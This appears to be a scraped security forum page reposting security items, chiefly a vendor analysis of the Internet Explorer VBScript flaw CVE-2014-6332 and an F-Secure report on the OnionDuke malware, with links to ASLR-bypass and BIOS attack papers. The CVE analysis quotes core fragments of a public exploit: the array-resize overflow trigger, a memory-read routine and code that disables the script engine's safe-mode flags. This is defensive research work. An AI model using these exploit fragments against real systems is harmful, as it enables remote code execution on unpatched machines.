
    Tricou RST

    Deci, pareri, sugestii? Cine mai vrea?
  21. Si, in ce stadiu e proiectul?
  22. Bypassing Address Space Layout Randomization Toby ’TheXero’ Reynolds April 15, 2012 Contents Introduction Method 1 - Partial overwrite Method 2 - Non ASLR Method 3 - Brute force Conclusion Download: http://nullsecurity.net/papers/nullsec-bypass-aslr.pdf
  23. A Killer Combo: Critical Vulnerability and ‘Godmode’ Exploitation on CVE-2014-6332 by Weimin Wu (Threat Analyst) Microsoft released 16 security updates during its Patch Tuesday release for November 2014, among which includes CVE-2014-6332, or the Windows OLE Automation Array Remote Code Execution Vulnerability (covered in MS14-064). We would like to bring attention to this particular vulnerability for the following reasons: It impacts almost all Microsoft Windows versions from Windows 95 onward. A stable exploit exists and works in versions of Internet Explorer from 3 to 11, and can bypass operating system (OS) security utilities and protection such as Enhanced Mitigation Experience Toolkit (EMET), Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR),and Control-Flow Integrity (CFI). Proof of concept (PoC) exploit code has recently been published by a Chinese researcher named Yuange1975. Based on the PoC, it’s fairly simple to write malicious VBScript code for attacks. Attackers may soon utilize the PoC to target unpatched systems. About the CVE-2014-6332 Vulnerability The bug is caused by improper handling resizing an array in the Internet Explorer VBScript engine. VBScript is the default scripting language in ASP (Active Server Pages). Other browsers like Google Chrome do not support VBScript, but Internet Explorer still supports it via a legacy engine to ensure backward compatibility. An array has the following structure in the VBScript engine: typedef struct tagSAFEARRAY { USHORT cDims; USHORT fFeatures; ULONG cbElements; ULONG cLocks; PVOID pvData; SAFEARRAYBOUND rgsabound[ 1 ]; } SAFEARRAY; typedef struct tagSAFEARRAYBOUND { ULONG cElements; LONG lLbound; } SAFEARRAYBOUND; pvData is a pointer to address of the array, and rgsabound [0].cElements stands for the numbers of elements in the array. Each element is a structure Var, whose size is 0×10: Var { 0×00: varType 0×04: padding 0×08: dataHigh 0x0c: dataLow } A bug may occur upon redefining an array with new length in VBScript, such as: redim aa(a0) … redim Preserve aa(a1) VBScript engine will call function OLEAUT32!SafeArrayRedim(), whose arguments are: First: ppsaOUT //the safeArray address Second: psaboundNew //the address of SAFEARRAY, which contains the new //number of elements: arg_newElementsSize Figure 1. Code of function SafeArrayRedim() The function SafeArrayRedim() does the following steps: Get the size of old array: oldSize= arg_pSafeArray-> cbElements*0×10 Set the new number to the array: arg_pSafeArray-> rgsabound[0].cElements = arg_newElementsSize Get the size of new array: newSize = arg_newElementsSize*0×10 Get the difference: sub = newSize – oldSize If sub > 0, goto bigger_alloc (this branch has no problem) If sub < 0, goto less_alloc to reallocate memory by function ole32!CRetailMalloc_Realloc() In this case, go this branch. Though sub > 0×8000000 as unsigned integer, sub is treated as negative value here because opcode jge works on signed integer. Here is the problem: integer overflow (singed/unsigned) cElements is used as unsigned integer; oldsize, newsize, sub is used as unsigned integer sub is treated as signed integer in opcode jge comparision The Dangerous PoC Exploit This critical vulnerability can be triggered in a simple way. For VBScript engine, there is a magic exploitation method called “Godmode”. With “Godmode,” arbitrary code written in VBScript can break the browser sandbox. Attackers do not need to write shellcode and ROP; DEP and ALSR protection is naturally useless here. Because we can do almost everything by VBScript in “Godmode,” a file infector payload is not necessary in this situation. This makes it easy to evade the detections on heap spray, Return Oriented Programming (ROP), shellcode, or a file infector payload. Next, we’ll see how the reliable the existing PoC is. Exploiting the vulnerability Firstl, the exploit PoC does type confusion using this vulnerability. It defines two arrays: aa and ab, and then resizes aa with a huge number. a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) Because the type of arrays aa and ab are same, and the elements number is equal, it’s possible to have the array memory layout as following: Figure 2. Expected memory layout of array aa, ab When redim Preserve aa(a2)” ,a2 = a0+&h8000000, is run, it may trigger the vulnerability. If that happens, the out-of-bound elements of aa are accessible. The PoC then uses it to do type confusion on element of ab. But the memory layout does not always meet the expectation, and the bug may not be triggered every time. So the PoC tries many times to meet the following condition: The address of ab(b0) is a pointer to the type field (naturally, b0=0 here) The address of aa(a0) is a pointer to the data high field of ab(b0) Which means: address( aa(a0)) is equal to address( ab(b0)) + 8 Figure 3. Memory layout the conditions meet Then, modifying the ab(b0) data high field equals to modifying the aa(a0) type field — typeconfusion. Secondly, the PoC makes any memory readable by the type confusion. Function readmem(add) On Error Resume Next ab(b0)=0 // type of aa(a0) is changed to int aa(a0)=add+4 // the high data of aa(a0) is set to add+4 ab(b0)=1.69759663316747E-313 // thisis 0×0000000800000008 // now, type of aa(a0) is changed to bstr readmem=lenb(aa(a0)) // length of bstr stores in pBstrBase-4 // lenb(aa(a0)) = [pBstrBase-4] = [add+4-4] ab(b0)=0 end function The abovementioned function can return any [add], which is used to enter “Godmode.” Enter “Godmode” We know that VBScript can be used in browsers or the local shell. When used in the browser, its behavior is restricted, but the restriction is controlled by some flags. That means, if the flags are modified, VBScript in HTML can do everything as in the local shell. That way, attackers can write malicious code in VBScript easily, which is known as “Godmode.” The following function in the PoC exploit is used to enter “Godmode”. The said flags exists in the object COleScript. If the address of COleScript is retrieved, the flags can be modified. function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) // get address of CScriptEntryPoint which includes pointer to COleScript i=readmemo(i+16) // get address of COleScript which includes pointer the said safemode flags j=readmemo(i+&h134) for k=0 to &h60 step 4 // for compatibility of different IE versions j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) // change safemode flags redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function Here, function mydata() can return a variable of function object, which includes a pointer to CScriptEntryPoint. Then we raise a question: If the address of a function object is not accessible using VBScript, how does the PoC make it? The following function shows a smart trick in this PoC: function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function The key is in the first three lines of the function: i=testaa We know that we cannot get the address of a function object in VBScript. This code seems to be nonsense. However, let’s see the call stack when executing it. Before the above line, the stack is empty. First, the VM translates testaa as a function, and puts its address into the stack. Second, VM translates the address of i, and tries assignment operation. However, the VM finds that the type in stack is function object. So it returns an error and enter error handling. Because “On Error Resume Next” is set in the function mydata(), VM will continue the next sentence even when the error occurs. i=null For this line, VM translates “null” first. For “null”, VM will not put a data into stack. Instead, it only changes the type of the last data in stack to 0×1!! Then VM assigns it to i, — that’s just the address of function testaa(), though the type of i is VT_NULL. The abovementioned lines are used to leak the address of function testaa() from a VT_NULL type. Conclusion The “Godmode” of legacy VBScript engine is the most dangerous risk in Internet Explorer. If a suitable vulnerability is found, attackers can develop stable exploits within small effort. CVE-2014-6322 is just one of vulnerabilities the most easily to do that. Fortunately, Microsoft has released patch for that particular CVE, but we still expect Microsoft to provide direct fix for “Godmode,” in the same way Chrome abandoned support for VBScript. In addition, this vulnerability is fairly simple to exploit and to bypass all protection to enter into VBScript GodMode(), which in turn can make attackers ‘super user’ thus having full control on the system. Attackers do not necessarily need shellcode to compromise their targets. The scope of affected Windows versions is very broad, with many affected versions (such as Windows 95 and WIndows XP) no longer supported. This raises the risk for these older OSes in particular, as they are vulnerable to exploits. This vulnerability is very rare since it affects almost OS versions, and at the same time the exploit is advanced that it bypasses all Microsoft protections including DEP, ASLR, EMET, and CFI. With this killer combination of advanced exploitation technique and wide arrayed of affected platforms, there’s a high possibility that attackers may leverage this in their future attacks. Solutions and Recommendations We highly recommend users to implement the following best practices: Install Microsoft patches immediately. Using any other browser aside from Internet Explorer before patching may also mitigate the risks. We advise users also to employ newer versions of Windows platforms that are supported by Microsoft. Trend Micro™ Deep Security and Vulnerability Protection, part of our Smart Protection Suites, are our recommended solutions for enterprises to defend their systems against these types of attacks. Trend Micro Deep Security and Office Scan with the Intrusion Defense Firewall (IDF) plugin protect user systems from threats that may leverage this vulnerability via the following DPI rules: 1006324 – Windows OLE Automation Array Remote Code Execution Vulnerability (CVE-2014-6332) 1006290 – Microsoft Windows OLE Remote Code Execution Vulnerability 1006291 – Microsoft Windows OLE Remote Code Execution Vulnerability -1 For more information on the support for all vulnerabilities disclosed in this month’s Patch Tuesday, go to our Threat Encyclopedia page. Sursa: A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332
  24. OnionDuke: APT Attacks Via the Tor Network Recently, research was published identifying a Tor exit node, located in Russia, that was consistently and maliciously modifying any uncompressed Windows executables downloaded through it. Naturally this piqued our interest, so we decided to peer down the rabbit hole. Suffice to say, the hole was a lot deeper than we expected! In fact, it went all the way back to the notorious Russian APT family MiniDuke, known to have been used in targeted attacks against NATO and European government agencies. The malware used in this case is, however, not a version of MiniDuke. It is instead a separate, distinct family of malware that we have since taken to calling OnionDuke. But lets start from the beginning. When a user attempts to download an executable via the malicious Tor exit node, what they actually receive is an executable "wrapper" that embeds both the original executable and a second, malicious executable. By using a separate wrapper, the malicious actors are able to bypass any integrity checks the original binary might contain. Upon execution, the wrapper will proceed to write to disk and execute the original executable, thereby tricking the user into believing that everything went fine. However, the wrapper will also write to disk and execute the second executable. In all the cases we have observed, this malicious executable has been the same binary (SHA1: a75995f94854dea8799650a2f4a97980b71199d2, detected as Trojan-Dropper:W32/OnionDuke.A). This executable is a dropper containing a PE resource that pretends to be an embedded GIF image file. In reality, the resource is actually an encrypted dynamically linked library (DLL) file. The dropper will proceed to decrypt this DLL, write it to disk and execute it. A flowchart of the infection process Once executed, the DLL file (SHA1: b491c14d8cfb48636f6095b7b16555e9a575d57f, detected as Backdoor:W32/OnionDuke.B) will decrypt an embedded configuration (shown below) and attempt to connect to hardcoded C&C URLs specified in the configuration data. From these C&Cs the malware may receive instructions to download and execute additional malicious components. It should be noted, that we believe all five domains contacted by the malware are innocent websites compromised by the malware operators, not dedicated malicious servers. A screenshot of the embedded configuration data Through our research, we have also been able to identify multiple other components of the OnionDuke malware family. We have, for instance, observed components dedicated to stealing login credentials from the victim machine and components dedicated to gathering further information on the compromised system like the presence of antivirus software or a firewall. Some of these components have been observed being downloaded and executed by the original backdoor process but for other components, we have yet to identify the infection vector. Most of these components don't embed their own C&C information but rather communicate with their controllers through the original backdoor process. One component, however, is an interesting exception. This DLL file (SHA1 d433f281cf56015941a1c2cb87066ca62ea1db37, detected as Backdoor:W32/OnionDuke.A) contains among its configuration data a different hardcoded C&C domain, overpict.com and also evidence suggesting that this component may abuse Twitter as an additional C&C channel. What makes the overpict.com domain interesting, is it was originally registered in 2011 with the alias of "John Kasai". Within a two-week window, "John Kasai" also registered the following domains: airtravelabroad.com, beijingnewsblog.net, grouptumbler.com, leveldelta.com, nasdaqblog.net, natureinhome.com, nestedmail.com, nostressjob.com, nytunion.com, oilnewsblog.com, sixsquare.net and ustradecomp.com. This is significant because the domains leveldelta.com and grouptumbler.com have previously been identified as C&C domains used by MiniDuke. This strongly suggests that although OnionDuke and MiniDuke are two separate families of malware, the actors behind them are connected through the use of shared infrastructure. A visualization of the infrastructure shared between OnionDuke and MiniDuke Based on compilation timestamps and discovery dates of samples we have observed, we believe the OnionDuke operators have been infecting downloaded executables at least since the end of October 2013. We also have evidence suggesting that, at least since February of 2014, OnionDuke has not only been spread by modifying downloaded executables but also by infecting executables in .torrent files containing pirated software. However, it would seem that the OnionDuke family is much older, both based on older compilation timestamps and also on the fact that some of the embedded configuration data make reference to an apparent version number of 4 suggesting that at least three earlier versions of the family exist. During our research, we have also uncovered strong evidence suggesting that OnionDuke has been used in targeted attacks against European government agencies, although we have so far been unable to identify the infection vector(s). Interestingly, this would suggest two very different targeting strategies. On one hand is the "shooting a fly with a cannon" mass-infection strategy through modified binaries and, on the other, the more surgical targeting traditionally associated with APT operations. In any case, although much is still shrouded in mystery and speculation, one thing is certain. While using Tor may help you stay anonymous, it does at the same time paint a huge target on your back. It's never a good idea to download binaries via Tor (or anything else) without encryption. The problem with Tor is that you have no idea who is maintaining the exit node you are using and what their motives are. VPNs (such as our Freedome VPN) will encrypt your connection all the way through the Tor network, so the maintainers of Tor exit nodes will not see your traffic and can't tamper with it. Samples: • a75995f94854dea8799650a2f4a97980b71199d2 • b491c14d8cfb48636f6095b7b16555e9a575d57f • d433f281cf56015941a1c2cb87066ca62ea1db37 Detected as: Trojan-Dropper:W32/OnionDuke.A, Backdoor:W32/OnionDuke.A, and Backdoor:W32/OnionDuke.B. Post by — Artturi (@lehtior2) Sursa: OnionDuke: APT Attacks Via the Tor Network - F-Secure Weblog : News from the Lab
  25. BIOS and Secure Boot Attacks Uncovered Andrew Furtak, Yuriy Bulygin, Oleksandr Bazhaniuk, John Loucaides, Alexander Matrosov, Mikhail Gorobets Signed BIOS Updates Are Rare Mebromimalware includes BIOS infector & MBR bootkitcomponents •Patches BIOS ROM binary injecting malicious ISA Option ROM with legitimate BIOS image mod utility •Triggers SW SMI 0x29/0x2F to erase SPI flash then write patched BIOS binary No Signature Checks of OS boot loaders (MBR) •No concept of Secure or Verified Boot •Wonder why TDL4 and likes flourished? Slides: http://www.c7zero.info/stuff/BIOSandSecureBootAttacksUncovered_eko10.pdf
×
×
  • Create New...